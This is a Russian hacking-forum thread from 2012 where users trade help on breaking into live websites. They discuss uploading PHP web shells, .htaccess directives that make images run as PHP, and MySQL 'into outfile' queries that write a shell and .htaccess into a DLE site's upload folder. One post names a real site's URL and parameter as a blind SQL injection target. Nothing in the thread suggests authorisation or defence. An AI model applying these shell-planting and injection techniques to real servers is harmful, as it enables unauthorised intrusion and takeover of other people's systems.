25.04.2012, 11:18
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от mix0x0
Есть xss на одном ресурсе, не получается определить тип.
Создаю новость, вписываю в тело страницы
При обновлении, вылетает пустой алерт. В исходнике не отображается вписанный код. Первая мысль, что это DOM-BASED, но вся соль в том, что я ява-скрипт не вписываю через адресную строку, следовательно мой код где-то сохраняется, но когда после вылета алерта открываю исходник, то эксплойта нет!
не подскажите, что за бред с xss?)
Это DOM BASED
|
|
|
25.04.2012, 17:20
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
пытаюсь залить шелл (я могу заливать zip архивы, а на сервере он сам распаковывается), сам файл норм. заливается, но при открытии shell.php выскакивает ошибка:
Сообщение от None
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, postmaster@site.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
я так понял это из-за htaccess, попробовал залить свой htaccess с содержимым
Сообщение от None
AddType application/x-httpd-php .png
AddHandler application/x-httpd-php .png
но при попытки открыть shell.png он просто скачивается.
вообщем я хз что делать... |
|
|
|
25.04.2012, 17:54
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 5
С нами:
9176819
Репутация:
1
|
|
ребят,подскажите,плз...в какую сторону копать?)...
сканнер показывает blind-sql здесь в параметре mna :
http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray[]=male&srch=y&srchsexarray=1&mna=-89
http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray[]=male&srch=y&srchsexarray=1&mna=89
здесь ошибка с раскрытием путей:
http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=S earch&sexarray=male&srch=y&srchsexarray=1
можно ли раскрутить это скулю или это ошибка сканнера?
|
|
|
|
25.04.2012, 19:56
|
|
Новичок
Регистрация: 22.04.2012
Сообщений: 28
С нами:
7398326
Репутация:
0
|
|
мел кто дело с SFTcms v 2.0?
Картинки заливаются, но куда, черт ногу сломит =/
|
|
|
|
25.04.2012, 20:24
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от Марок
мел кто дело с SFTcms v 2.0?
Картинки заливаются, но куда, черт ногу сломит =/
А посмотреть уже залитые картинке не?
|
|
|
|
26.04.2012, 00:52
|
|
Новичок
Регистрация: 26.01.2012
Сообщений: 14
С нами:
7523606
Репутация:
5
|
|
подскажите, имеется доступ к mysql.root, как можно залить шел на сервере, CMS DLE 9,5
я делаю по 2 запроса одного типа
первый
Сообщение от None
select 'php_flag engine on
\r
AddType application/x-httpd-php .phtml .jpg .html
\r
AddHandler application/x-httpd-php .phtml .jpg .html' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/.htaccess'
и второй сам шелл
Сообщение от None
select '' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s.jpg'
оба запроса в одну папку разумеется
всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено..
Так же html и другие форматы заливаются типа .xss формат но уже Internal Server Error кажет
Что ещё можно залить вместо моего htaccess ? |
|
|
|
26.04.2012, 00:58
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от красавец
Что ещё можно залить вместо моего htaccess ?
либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?
|
|
|
|
26.04.2012, 01:09
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Сообщение от красавец
подскажите, имеется доступ к mysql.root, как можно залить шел на сервере,
CMS DLE 9,5
я делаю по 2 запроса одного типа
первый
и второй сам шелл
оба запроса в одну папку разумеется
всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено..
Так же html и другие форматы заливаются типа .xss формат но уже
Internal Server Error
кажет
Что ещё можно залить вместо моего htaccess ?
Прочитай .htaccess, может, там какие-то хитрые фильтры стоят при записи(то есть убедись, что все записалось нормально, нет лишних символов, перенос строки выполнен правильно)
Ну и да, как d1v сказал выше, что тебе мешает выполнить запрос select '' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s. php'
|
|
|
|
26.04.2012, 01:11
|
|
Новичок
Регистрация: 26.01.2012
Сообщений: 14
С нами:
7523606
Репутация:
5
|
|
Сообщение от d1v
либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?
мешает то что php не открывается просто так
я пытался разумеется сначало php залить
|
|
|
|
26.04.2012, 01:19
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от красавец
мешает то что php не открывается просто так
я пытался разумеется сначало php залить
ну попробуй в папку залить хтакес:
Сообщение от None
RewriteEngine Off
и патом в пхп записаться уже.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
